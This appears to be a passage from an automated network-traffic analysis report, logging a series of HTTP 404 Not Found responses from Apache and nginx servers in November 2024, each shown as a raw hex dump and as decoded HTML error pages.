                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:56:23 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:56:26 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:56:28 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 12:56:36 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6693a1e3-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 12:56:41 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6693a1e3-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 12:56:44 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6693a1e3-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:56:51 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 65 32 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /te2d/ was not found on this server.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:56:54 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 65 32 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /te2d/ was not found on this server.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:56:57 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 65 32 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /te2d/ was not found on this server.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:56:59 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 65 32 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /te2d/ was not found on this server.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:57:08 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:57:10 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:57:13 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20
